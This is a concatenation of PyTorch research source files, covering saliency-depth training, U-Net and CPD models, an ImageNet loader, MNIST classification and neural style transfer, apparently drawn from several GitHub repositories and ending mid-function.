model_rgb.load_state_dict(torch.load('./ckpt/' + 'DSU_rgb.pth.' + str(opt.snapshot)))
model_depth.load_state_dict(torch.load('./ckpt/' + 'DSU_depth.pth.' + str(opt.snapshot)))
model.load_state_dict(torch.load('./ckpt/' + 'DSU.pth.' + str(opt.snapshot)))
cuda = torch.cuda.is_available()
if cuda:
model_rgb.cuda()
model_depth.cuda()
model.cuda()
params_rgb = model_rgb.parameters()
params_depth = model_depth.parameters()
params = model.parameters()
optimizer_rgb = torch.optim.Adam(params_rgb, opt.lr)
optimizer_depth = torch.optim.Adam(params_depth, opt.lr)
optimizer = torch.optim.Adam(params, opt.lr)
train_loader = get_loader(image_root, gt_root, depth_root, batchsize=opt.batchsize, trainsize=opt.trainsize)
total_step = len(train_loader)
CE = torch.nn.BCEWithLogitsLoss()
MSE = torch.nn.MSELoss()
Distance = ContrastiveLoss()
def train(train_loader, model_rgb, model_depth, model,
optimizer_rgb, optimizer_depth,optimizer, epoch):
model_rgb.train()
model_depth.train()
model.train()
for i, pack in enumerate(tqdm(train_loader), start=1):
iteration = i + epoch*len(train_loader)
optimizer_rgb.zero_grad()
optimizer_depth.zero_grad()
optimizer.zero_grad()
images, gts, depths,ppath,ori_data = pack
images = Variable(images)
gts = Variable(gts)
depths = Variable(depths)
ori_data = [Variable(i) for i in ori_data]
if cuda:
images = images.cuda()
gts = gts.cuda()
depths = depths.cuda()
ori_data = [i.cuda() for i in ori_data]
'''~~~Our DSU Framework~~~'''
# RGB Stream
'''Attentive Training Strategy'''
atts_rgb,dets_rgb,_= model_rgb(images)
pred_sal = dets_rgb.detach()
# The update interval τ is 3, amounting to 2τ = 6 epochs in a training round.
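        # Descriptive note (added for clarity): within each 6-epoch round,
        # (epoch + 1) % 6 in {1, 2, 3} selects Step One (plain BCE against the
        # pseudo labels), while {4, 5, 0} selects Step Two (BCE re-weighted by
        # loss_weight); the pseudo labels themselves are refreshed when
        # (epoch + 1) % 6 == 0 further below.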
if (epoch + 1) % 6 <= 3 and (epoch + 1) % 6 > 0: # Step One
loss_rgb1 = CE(atts_rgb, gts)
loss_rgb2 = CE(dets_rgb, gts)
loss_rgb = (loss_rgb1 + loss_rgb2) / 2.0
else: # Step Two
weight, _ = loss_weight(dets_rgb, gts)
Weighted_CE = torch.nn.BCEWithLogitsLoss(weight=weight)
loss_rgb1 = Weighted_CE(atts_rgb, gts)
loss_rgb2 = Weighted_CE(dets_rgb, gts)
loss_rgb = (loss_rgb1 + loss_rgb2) / 2.0
loss_rgb.backward()
clip_gradient(optimizer_rgb, opt.clip)
optimizer_rgb.step()
# Depth Stream
atts_depth,dets_depth,feature = model_depth(images)
loss_depth1 = MSE(atts_depth, depths)
loss_depth2 = MSE(dets_depth, depths)
loss_depth = (loss_depth1 + loss_depth2) / 2.0
loss_depth.backward()
clip_gradient(optimizer_depth, opt.clip)
optimizer_depth.step()
# Fusion stream
old_feature = feature.detach()
S_dep, Non_S_dep, new_feature, depth_pos, depth_neg, pred_depth = model(pred_sal,depths,old_feature)
loss_Sal_depth = MSE(S_dep,depth_pos)
loss_NonSal_depth = MSE(Non_S_dep,depth_neg)
loss_depth_new = MSE(pred_depth,depths)
loss_consistency = Distance(old_feature,new_feature)/50
loss = (loss_Sal_depth + loss_NonSal_depth + loss_depth_new + loss_consistency)/4.0
loss.backward()
clip_gradient(optimizer, opt.clip)
optimizer.step()
if (epoch + 1) % 6 == 0:
'''Update pseudo Label'''
# Note that: we need to obtain original data with no augmentation to replace the fake label
with torch.no_grad():
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
img_ori,gt_ori,depth_ori = ori_data
_, det_rgb, _ = model_rgb(img_ori)
pred_saliency = det_rgb.detach()
_, _, feature1 = model_depth(img_ori)
old_feature1 = feature1.detach()
S_dep1, Non_S_dep1, _, _, _, _ = model(pred_saliency, depth_ori, old_feature1)
S_depth1 = S_dep1.detach()
Non_S_depth1 = Non_S_dep1.detach()
_, l_weight = loss_weight(pred_saliency, gt_ori)
update_pseudoLabel(l_weight,ppath,S_depth1,Non_S_depth1,pred_saliency,int(epoch+1))
'''~~~END~~~'''
if i % 400 == 0 or i == total_step:
print('{} Epoch [{:03d}/{:03d}], Step [{:04d}/{:04d}], Loss_rgb: {:.4f} Loss_depth_sal: {:0.4f}'.
format(datetime.now(), epoch, opt.epoch, i, total_step, loss_rgb.data, loss.data))
writer.add_scalar('Loss/rgb', loss_rgb.item(), iteration)
writer.add_scalar('Loss/depth', loss_depth.item(), iteration)
writer.add_scalar('Loss/Sal_depth', loss.item(), iteration)
save_path = 'ckpt/'
if not os.path.exists(save_path):
os.makedirs(save_path)
if (epoch+1) % 2 == 0:
torch.save(model_rgb.state_dict(), save_path + 'DSU_rgb.pth' + '.%d' % (epoch+1))
torch.save(model_depth.state_dict(), save_path + 'DSU_depth.pth' + '.%d' % (epoch + 1))
torch.save(model.state_dict(), save_path + 'DSU.pth' + '.%d' % (epoch + 1))
print("Let's go!")
for epoch in range(1, opt.epoch):
adjust_lr(optimizer_rgb, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
adjust_lr(optimizer_depth, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
adjust_lr(optimizer, opt.lr, epoch, opt.decay_rate, opt.decay_epoch)
train(train_loader, model_rgb, model_depth, model,
optimizer_rgb, optimizer_depth,optimizer, epoch)
if (epoch+1) % 2 == 0:
ckpt_name = '.' + str(epoch+1)
eval_data(val_root, validation,ckpt_name)
if epoch >= opt.epoch -1:
writer.close()
```
#### File: DSU_Code/model/Sal_CNN.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
import numpy as np
import scipy.stats as st
import matplotlib.pyplot as plt
class BasicConv2d(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes,
kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False)
self.bn = nn.BatchNorm2d(out_planes)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
def gkern(kernlen=16, nsig=3):
interval = (2*nsig+1.)/kernlen
x = np.linspace(-nsig-interval/2., nsig+interval/2., kernlen+1)
kern1d = np.diff(st.norm.cdf(x))
kernel_raw = np.sqrt(np.outer(kern1d, kern1d))
kernel = kernel_raw/kernel_raw.sum()
return kernel
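# Worked example (added for clarity, not part of the original module):
#     k = gkern(31, 4)   # the kernel instantiated by HA below
#     k.shape            # (31, 31)
#     k.sum()            # ~= 1.0, since the kernel is normalized, with its peak
#                        # at the centre entry k[15, 15]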
def min_max_norm(in_):
max_ = in_.max(3)[0].max(2)[0].unsqueeze(2).unsqueeze(3).expand_as(in_)
min_ = in_.min(3)[0].min(2)[0].unsqueeze(2).unsqueeze(3).expand_as(in_)
in_ = in_ - min_
return in_.div(max_-min_+1e-8)
class HA(nn.Module):
# holistic attention module
def __init__(self):
super(HA, self).__init__()
gaussian_kernel = np.float32(gkern(31, 4))
gaussian_kernel = gaussian_kernel[np.newaxis, np.newaxis, ...]
self.gaussian_kernel = Parameter(torch.from_numpy(gaussian_kernel))
def forward(self, attention, x):
soft_attention = F.conv2d(attention, self.gaussian_kernel, padding=15)
soft_attention = min_max_norm(soft_attention)
Soft_Att= soft_attention.max(attention)
zero = torch.zeros_like(Soft_Att)
one = torch.ones_like(Soft_Att)
Soft_Att = torch.tensor(torch.where(Soft_Att > 0.05, one, Soft_Att))
Soft_Att = torch.tensor(torch.where(Soft_Att <=0.05, zero, Soft_Att))
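        # Descriptive note (added for clarity): the two torch.where calls above
        # binarize the soft attention at a 0.05 threshold, producing a hard
        # saliency mask; multiplying the depth map by the mask and by its
        # complement splits it into a salient part (Depth_pos) and a
        # non-salient part (Depth_neg).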
Depth_pos = torch.mul(x, Soft_Att)
Depth_neg = torch.mul(x, 1- Soft_Att)
return Depth_pos, Depth_neg
class Sal_CNN(nn.Module):
def __init__(self):
super(Sal_CNN, self).__init__()
in_channel = 32*3
out_channel = 1
self.Sal_Dep1= nn.Sequential(
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
)
self.pred1 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.NonSal_Dep1 = nn.Sequential(
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
BasicConv2d(in_channel, in_channel, kernel_size=3, padding=1),
)
self.pred2 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.pred3 = nn.Conv2d(in_channel, out_channel, kernel_size=1, padding=0)
self.HA = HA()
self._init_weight()
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self,pred_sal,depths,feature):
'''Generating the disentangled depth masks'''
depth_pos, depth_neg = self.HA(pred_sal.sigmoid(),depths)
'''Disentangle Depth'''
# Saliency-guided Depth
x1 = self.Sal_Dep1(feature)
S_dep = self.pred1(x1)
# Non_Saliency Depth
x2 = self.NonSal_Dep1(feature)
Non_S_dep = self.pred2(x2)
new_feature = x1 + x2
pred_depth = self.pred3(new_feature)
return S_dep, Non_S_dep, new_feature, depth_pos, depth_neg,pred_depth
``` |
{
"source": "jiwei0921/JSM",
"score": 2
} |
#### File: model/0VGG/CPD_models.py
```python
import torch
import torch.nn as nn
from model.vgg import B2_VGG
class aggregation(nn.Module):
def __init__(self, channel):
super(aggregation, self).__init__()
self.relu = nn.ReLU(True)
self.upsample = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)
self.conv_x1 = nn.Conv2d(channel*8, channel, 3, padding=1)
self.conv_x2 = nn.Conv2d(channel*8, channel, 3, padding=1)
self.conv_x3 = nn.Conv2d(channel*4, channel, 3, padding=1)
self.conv_upsample1 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample2 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample3 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_upsample5 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv_concat2 = nn.Conv2d(2*channel, channel, 3, padding=1)
self.conv_concat3 = nn.Conv2d(2*channel, channel, 3, padding=1)
self.conv4 = nn.Conv2d(channel, channel, 3, padding=1)
self.conv5 = nn.Conv2d(channel, 1, 1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(std=0.01)
m.bias.data.fill_(0)
def forward(self, x1, x2, x3):
# x1: 1/16 x2: 1/8 x3: 1/4
x1_1 = self.conv_x1(x1)
x2_1 = self.conv_x2(x2)
x3_1 = self.conv_x3(x3)
x2_2 = torch.cat((x2_1, self.conv_upsample4(self.upsample(x1_1))), 1)
x2_2 = self.conv_concat2(x2_2)
x3_2 = torch.cat((x3_1, self.conv_upsample5(self.upsample(x2_2))), 1)
x3_2 = self.conv_concat3(x3_2)
x = self.conv4(x3_2)
fea = x
x = self.conv5(x)
return x, fea
class CPD_VGG(nn.Module):
def __init__(self, channel=64):
super(CPD_VGG, self).__init__()
self.vgg = B2_VGG()
self.agg1 = aggregation(channel)
self.upsample = nn.Upsample(scale_factor=4, mode='bilinear', align_corners=False)
def forward(self, x):
x1 = self.vgg.conv1(x)
x2 = self.vgg.conv2(x1)
x3 = self.vgg.conv3(x2)
x3_1 = x3
x4_1 = self.vgg.conv4_1(x3_1)
x5_1 = self.vgg.conv5_1(x4_1)
detection, feature = self.agg1(x5_1, x4_1, x3_1)
return self.upsample(detection), self.upsample(feature)
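# Usage sketch (illustrative; assumes B2_VGG weights are available and a 3-channel input):
#   net = CPD_VGG(channel=64)
#   detection, feature = net(torch.randn(1, 3, 352, 352))
# Per the scale comment in aggregation.forward (x1: 1/16, x2: 1/8, x3: 1/4), agg1 fuses the
# three stages back to 1/4 resolution and the final nn.Upsample(scale_factor=4) returns the
# saliency map and feature at the input resolution.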
``` |
{
"source": "jiwei0921/MRNet",
"score": 2
} |
#### File: models/Unet/unet_model.py
```python
from .unet_parts import *
from torch import nn
import torch
from .res_net import resnet34, resnet18, resnet50, resnet101, resnet152
import torch.nn.functional as F
from torch.autograd import Variable
class SaveFeatures():
features = None
def __init__(self, m): self.hook = m.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output): self.features = output
def remove(self): self.hook.remove()
class UnetBlock(nn.Module):
def __init__(self, up_in, x_in, n_out):
super().__init__()
# super(UnetBlock, self).__init__()
up_out = x_out = n_out // 2
self.x_conv = nn.Conv2d(x_in, x_out, 1)
self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)
self.bn = nn.BatchNorm2d(n_out)
def forward(self, up_p, x_p):
up_p = self.tr_conv(up_p)
x_p = self.x_conv(x_p)
cat_p = torch.cat([up_p, x_p], dim=1)
return self.bn(F.relu(cat_p))
class UNet(nn.Module):
def __init__(self, resnet='resnet34', num_classes=2, pretrained=False):
super().__init__()
# super(ResUnet, self).__init__()
cut, lr_cut = [8, 6]
if resnet == 'resnet34':
base_model = resnet34
elif resnet == 'resnet18':
base_model = resnet18
elif resnet == 'resnet50':
base_model = resnet50
elif resnet == 'resnet101':
            base_model = resnet101
elif resnet == 'resnet152':
base_model = resnet152
else:
raise Exception('The Resnet Model only accept resnet18, resnet34, resnet50,'
'resnet101 and resnet152')
layers = list(base_model(pretrained=pretrained).children())[:cut]
base_layers = nn.Sequential(*layers)
self.rn = base_layers
self.num_classes = num_classes
self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]
self.up1 = UnetBlock(512, 256, 256)
self.up2 = UnetBlock(256, 128, 256)
self.up3 = UnetBlock(256, 64, 256)
self.up4 = UnetBlock(256, 64, 256)
self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)
'''~~~ self definition ~~~'''
self.up_c1 = nn.ConvTranspose2d(6, 6, 4, stride=2)
self.up_c2 = nn.ConvTranspose2d(6, 512, 2, stride=2)
self.conv = nn.Conv2d(6,512,3,padding=1)
self.CONVLSTMcell = ConvLSTMCell(512, 512)
def forward(self, x, condition):
        x = F.relu(self.rn(x)) # x = [b_size, 512, 8, 8] for the default resnet34 backbone (later layers assume 512 channels)
'''~~~ 1: Condition + feature ==> ConvLSTM ~~~'''
condition = condition.unsqueeze(-1).unsqueeze(-1).expand(-1,-1,8,8)
condition = self.conv(condition)
# condition = self.up_c2(self.up_c1(condition.unsqueeze(-1).unsqueeze(-1))) # x = [b_size, 512, 8, 8]
for t in range(0, 1): # step =1
state = self.CONVLSTMcell(x, [condition, condition])
x = state[0]
'''~~~ 1: ENDs ~~~'''
'''~~~ 0: Decoder ~~~'''
x = self.up1(x, self.sfs[3].features)
x = self.up2(x, self.sfs[2].features)
x = self.up3(x, self.sfs[1].features)
x = self.up4(x, self.sfs[0].features)
fea = x
output = self.up5(x)
'''~~~ 0: ENDs ~~~'''
'''
if self.num_classes==1:
output = x_out[:, 0]
else:
output = x_out[:, :self.num_classes]
'''
return output, fea
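    # Note: forward() injects the task condition by broadcasting the 6-d condition vector to
    # the 8x8 bottleneck, projecting it to 512 channels with self.conv, and using the result
    # as both the hidden and cell state of a single ConvLSTM step before the decoder runs.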
def close(self):
for sf in self.sfs: sf.remove()
class ConvLSTMCell(nn.Module):
"""
Generate a convolutional LSTM cell
"""
def __init__(self, input_size, hidden_size):
super(ConvLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.Gates = nn.Conv2d(input_size + hidden_size, 4 * hidden_size, 3, padding=1)
def forward(self, input_, prev_state):
# get batch and spatial sizes
batch_size = input_.data.size()[0]
spatial_size = input_.data.size()[2:]
# generate empty prev_state, if None is provided
if prev_state is None:
state_size = [batch_size, self.hidden_size] + list(spatial_size)
prev_state = (
Variable(torch.zeros(state_size)),
Variable(torch.zeros(state_size))
)
prev_hidden, prev_cell = prev_state
# data size is [batch, channel, height, width]
stacked_inputs = torch.cat((input_, prev_hidden), 1)
gates = self.Gates(stacked_inputs)
# chunk across channel dimension
in_gate, remember_gate, out_gate, cell_gate = gates.chunk(4, 1)
# apply sigmoid non linearity
in_gate = torch.sigmoid(in_gate)
remember_gate = torch.sigmoid(remember_gate)
out_gate = torch.sigmoid(out_gate)
# apply tanh non linearity
cell_gate = torch.tanh(cell_gate)
# compute current cell and hidden state
cell = (remember_gate * prev_cell) + (in_gate * cell_gate)
hidden = out_gate * torch.tanh(cell)
return hidden, cell
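# Minimal standalone check of the cell above (illustrative; CPU tensors assumed):
#   cell = ConvLSTMCell(input_size=512, hidden_size=512)
#   x = torch.randn(2, 512, 8, 8)
#   h, c = cell(x, None)        # zero-initialised state
#   h, c = cell(x, (h, c))      # later steps reuse the returned state
# All four gates come from one 3x3 convolution over [input, hidden] concatenated along the
# channel dimension, so the spatial layout is preserved through the recurrence.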
```
#### File: utils/utils2/ActivationFun.py
```python
import numpy as np
def softmax(x, axis=-1):
e_x = np.exp(x - np.max(x, axis=axis, keepdims=True))
return e_x / np.sum(e_x, axis=axis, keepdims=True)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
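# Quick numerical check (illustrative): subtracting the per-axis max keeps softmax stable
# for large logits.
#   softmax(np.array([1000.0, 1000.0]))  # -> array([0.5, 0.5])
#   sigmoid(np.array([0.0]))             # -> array([0.5])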
```
#### File: utils/utils2/ComputeNetParameters.py
```python
import numpy as np
def computerNetParameters(net):
params = list(net.parameters())
k = 0
for index, i in enumerate(params):
l = 1
print(index+1, "layer structure:" + str(list(i.size())))
for j in i.size():
l *= j
print("layer paramenters: " +str(l))
k += l
print("network paramenters: " +str(k))
return k
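# Usage sketch (illustrative):
#   import torch.nn as nn
#   net = nn.Sequential(nn.Linear(10, 5), nn.Linear(5, 1))
#   total = computerNetParameters(net)   # prints per-layer shapes/counts and returns 61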
``` |
{
"source": "jiweibo/ImageNet",
"score": 2
} |
#### File: jiweibo/ImageNet/data_loader.py
```python
import os
import torch
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def data_loader(root, batch_size=256, workers=1, pin_memory=True):
traindir = os.path.join(root, 'ILSVRC2012_img_train')
valdir = os.path.join(root, 'ILSVRC2012_img_val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
)
val_dataset = datasets.ImageFolder(
valdir,
transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=workers,
pin_memory=pin_memory,
sampler=None
)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=False,
num_workers=workers,
pin_memory=pin_memory
)
return train_loader, val_loader
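# Usage sketch (illustrative; assumes the usual ImageNet layout with one sub-directory per
# class under ILSVRC2012_img_train and ILSVRC2012_img_val):
#   train_loader, val_loader = data_loader('/data/imagenet', batch_size=256, workers=8)
#   images, targets = next(iter(train_loader))   # images: [256, 3, 224, 224]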
``` |
{
"source": "jiweibo/MNIST_Recognition",
"score": 3
} |
#### File: jiweibo/MNIST_Recognition/mnist.py
```python
from __future__ import print_function
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
import numpy as np
import time
import matplotlib.pyplot as plt
# settings
DATA_DIR = '../../repository/data/mnist'
enable_cuda = True
# hyper parameters
batch_size = 64
num_epoches = 10
learning_rate = 1e-3
# datasets
transform = transforms.Compose([
transforms.ToTensor(),
    transforms.Normalize(mean=(0.5,), std=(0.5,))  # MNIST images are single-channel
])
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=True, download=True, transform=transform),
batch_size=batch_size,
shuffle=True
)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=False, download=False, transform=transform),
batch_size=batch_size,
shuffle=False
)
class Net(nn.Module):
def __init__(self, cuda):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 16, kernel_size=5, stride=1)
self.conv2 = nn.Conv2d(16, 64, kernel_size=5, stride=1)
self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
self.dropout = nn.Dropout(0.5)
self.fc1 = nn.Linear(4096, 84)
self.fc2 = nn.Linear(84, 10)
self.relu = nn.ReLU()
self.softmax = nn.Softmax()
self.use_cuda = cuda
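    # Shape walk-through for a 28x28 MNIST image (illustrative):
    #   conv1 (5x5) -> 24x24x16, max_pool -> 12x12x16, conv2 (5x5) -> 8x8x64,
    #   flatten -> 4096, fc1 -> 84, fc2 -> 10 log-probabilities.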
def forward(self, x):
x = self.relu(self.max_pool(self.conv1(x))) # 12 * 12 * 16
x = self.relu(self.conv2(x)) # 8 * 8 *64
x = x.view(-1, 64 * 64) # flatten
x = self.dropout(self.relu(self.fc1(x))) # size * 84
x = self.fc2(x) # size * 10
        return F.log_softmax(x, dim=1)
def evaluate(model, X):
model.eval()
if model.use_cuda:
X = torch.from_numpy(X.astype(np.float32)).cuda()
else:
X = torch.from_numpy(X.astype(np.float32))
X = Variable(X)
output = model(X)
output = F.softmax(output)
pred = output.data.max(dim=1)[1]
if model.use_cuda:
output, pred = output.cpu(), pred.cpu()
c = list(range(0, 10))
output = list(output.data.numpy().squeeze())
dic = dict(zip(c, output))
pred = pred.numpy().squeeze()
return dic, pred
def build_model(enable_cuda):
model = Net(enable_cuda)
if model.use_cuda:
model = model.cuda()
if os.path.exists('mnist_params.pkl'):
model.load_state_dict(torch.load('mnist_params.pkl'))
optimizer = optim.Adam(model.parameters(), learning_rate, betas=(0.9, 0.999))
return model, optimizer
def train(model, optimizer, train_loader, num_epoches):
start_time = time.time()
model.train()
for epoch in range(num_epoches):
for (batch_index, (data, target)) in enumerate(train_loader):
correct = 0
if model.use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
pred = output.data.max(dim=1)[1]
correct += pred.eq(target.data).cpu().sum()
if batch_index % 200 == 0:
print('Train Epoch: {} [{} / {}]\tLoss: {:.6f}\tAccuracy: {:.4f}'.format(
epoch,
batch_index * len(data),
len(train_loader.dataset),
                loss.item(),
correct / target.size()[0]
))
torch.save(model.state_dict(), 'mnist_params.pkl')
print('Time: ', time.time() - start_time)
def model_eval(model, test_loader):
model.eval()
test_loss = 0
correct = 0
error_data = []
error_rlabel = []
error_flabel = []
for data, target in test_loader:
if model.use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
        test_loss += F.nll_loss(output, target).item()
pred = output.data.max(dim=1)[1]
correct += pred.eq(target.data).cpu().sum()
# Error Analysis
error_idx = 1 - pred.eq(target.data).cpu().numpy()
if np.sum(error_idx) > 0:
error_data.append(data.data.cpu().numpy()[error_idx == 1])
error_flabel.append(pred.cpu().numpy()[error_idx == 1])
error_rlabel.append(target.data.cpu().numpy()[error_idx == 1])
show_samples(error_data, error_rlabel, error_flabel)
test_loss /= len(test_loader)
print('\nTest set: Average loss : {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(
test_loss,
correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)
))
def show_samples(data, label, pred):
fig, axes = plt.subplots(figsize=(28, 28), nrows=6, ncols=6)
for ax, img, lb, pr in zip(axes.flatten(), data, label, pred):
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
ax.imshow(img[0].reshape(28, 28), cmap='gray')
ax.set_title('true: {}---pred: {}'.format(lb[0], pr[0]))
plt.savefig('error_classification.jpg')
plt.show()
if __name__ == "__main__":
model, optimizer = build_model(enable_cuda)
# train(model, optimizer, train_loader, num_epoches)
model_eval(model, test_loader)
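    # To train from scratch, uncomment the train(...) call above; build_model() reloads
    # 'mnist_params.pkl' automatically on later runs if that checkpoint file exists.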
``` |
{
"source": "jiweibo/Neural-Style-Transfer",
"score": 3
} |
#### File: jiweibo/Neural-Style-Transfer/main.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
from PIL import Image
import matplotlib.pyplot as plt
import torchvision.transforms as transforms
import torchvision.models as models
import copy
import os
# whether cuda is available
use_cuda = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
# load, resize, totensor
imsize_h = 512
imsize_w = 512
# imsize = 512 if use_cuda else 128
loader = transforms.Compose([
    transforms.Resize((imsize_h, imsize_w)),  # transforms.Scale was removed from torchvision; Resize expects (h, w)
transforms.ToTensor()
])
def image_loader(image_name):
"""convert an image to a variable tensor"""
image = Image.open(image_name)
image = Variable(loader(image))
image = image.unsqueeze(0)
return image
# load image to variable tensor
output_img_path = 'images/output/'
style_img_path = 'images/style/'
content_img_path = 'images/content/'
style_img_name = 'the_shipwreck_of_the_minotaur.jpg'
content_img_name = 'Dipping-Sun.jpg'
style_img = image_loader(style_img_path + style_img_name).type(dtype)
content_img = image_loader(content_img_path + content_img_name).type(dtype)
assert style_img.size() == content_img.size(), \
"we need to import style and content images of the same size, but style size is ({}), " \
"content size is *({})".format(style_img.size(), content_img.size())
# convert a tensor to a PILImage
unloader = transforms.ToPILImage()
def imshow(tensor, title=None):
"""show image"""
image = tensor.clone().cpu()
image = image.view(3, imsize_w, imsize_h)
image = unloader(image)
plt.imshow(image)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
class ContentLoss(nn.Module):
"""Content Loss"""
def __init__(self, target, weight):
super(ContentLoss, self).__init__()
self.target = target.detach() * weight
self.weight = weight
self.criterion = nn.MSELoss()
def forward(self, input):
self.loss = self.criterion(input * self.weight, self.target)
self.output = input
return self.output
def backward(self, retain_graph=True):
self.loss.backward(retain_graph=retain_graph)
return self.loss
class GramMatrix(nn.Module):
def forward(self, input):
a, b, c, d = input.size()
features = input.view(a * b, c * d)
G = torch.mm(features, features.t())
return G.div(a * b * c * d)
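# The Gram matrix flattens each of the a*b feature maps into a row vector and takes their
# inner products, so G[i, j] measures how strongly channels i and j co-activate; dividing
# by a*b*c*d keeps the style loss scale independent of the layer size.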
class StyleLoss(nn.Module):
def __init__(self, target, weight):
super(StyleLoss, self).__init__()
self.target = target.detach() * weight
self.weight = weight
self.gram = GramMatrix()
self.criterion = nn.MSELoss()
def forward(self, input):
self.output = input.clone()
self.G = self.gram(input)
self.G.mul_(self.weight)
self.loss = self.criterion(self.G, self.target)
return self.output
def backward(self, retain_graph=True):
self.loss.backward(retain_graph=retain_graph)
return self.loss
# load model
cnn = models.vgg19(pretrained=True).features
if use_cuda:
cnn = cnn.cuda()
content_layers_default = ['conv_4']
style_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']
def get_style_model_and_losses(cnn, style_img, content_img,
style_weight=1000, content_weight=1,
content_layers=content_layers_default,
                               style_layers=style_layers_default):
cnn = copy.deepcopy(cnn)
content_losses = []
style_losses = []
model = nn.Sequential()
gram = GramMatrix()
if use_cuda:
model = model.cuda()
gram = gram.cuda()
i = 1
for layer in list(cnn):
if isinstance(layer, nn.Conv2d):
name = 'conv_' + str(i)
model.add_module(name, layer)
if name in content_layers:
target = model(content_img).clone()
content_loss = ContentLoss(target, content_weight)
model.add_module('content_loss' + str(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
target_feature = model(style_img).clone()
target_feature_gram = gram(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight)
model.add_module('style_loss' + str(i), style_loss)
style_losses.append(style_loss)
if isinstance(layer, nn.ReLU):
name = 'relu_' + str(i)
model.add_module(name, layer)
if name in content_layers:
target = model(content_img).clone()
content_loss = ContentLoss(target, content_weight)
model.add_module('content_loss' + str(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
target_feature = model(style_img).clone()
target_feature_gram = gram(target_feature)
style_loss = StyleLoss(target_feature_gram, style_weight)
model.add_module('style_loss' + str(i), style_loss)
style_losses.append(style_loss)
i += 1
if isinstance(layer, nn.MaxPool2d):
name = 'pool_' + str(i)
model.add_module(name, layer)
return model, style_losses, content_losses
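# get_style_model_and_losses rebuilds the VGG feature stack layer by layer and inserts a
# ContentLoss / StyleLoss module right after each selected conv/relu layer, so one forward
# pass through `model` fills in every .loss attribute that the closure later backpropagates.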
# input_img = content_img.clone()
input_img = Variable(torch.randn(content_img.data.size())).type(dtype)
def get_input_param_optimizer(input_img):
input_param = nn.Parameter(input_img.data)
# optimizer = optim.LBFGS([input_param])
optimizer = optim.Adam([input_param])
return input_param, optimizer
def run_style_transfer(cnn, content_img, style_img, input_img, num_steps=500,
style_weight=1000, content_weight=1):
print('Building the style transfer model..')
model, style_losses, content_losses = get_style_model_and_losses(cnn,
style_img, content_img, style_weight,
content_weight)
input_param, optimizer = get_input_param_optimizer(input_img)
print('Optimizing..')
run = [0]
while run[0] <= num_steps:
def closure():
input_param.data.clamp_(0, 1)
optimizer.zero_grad()
model(input_param)
style_score = 0
content_score = 0
for sl in style_losses:
style_score += sl.backward()
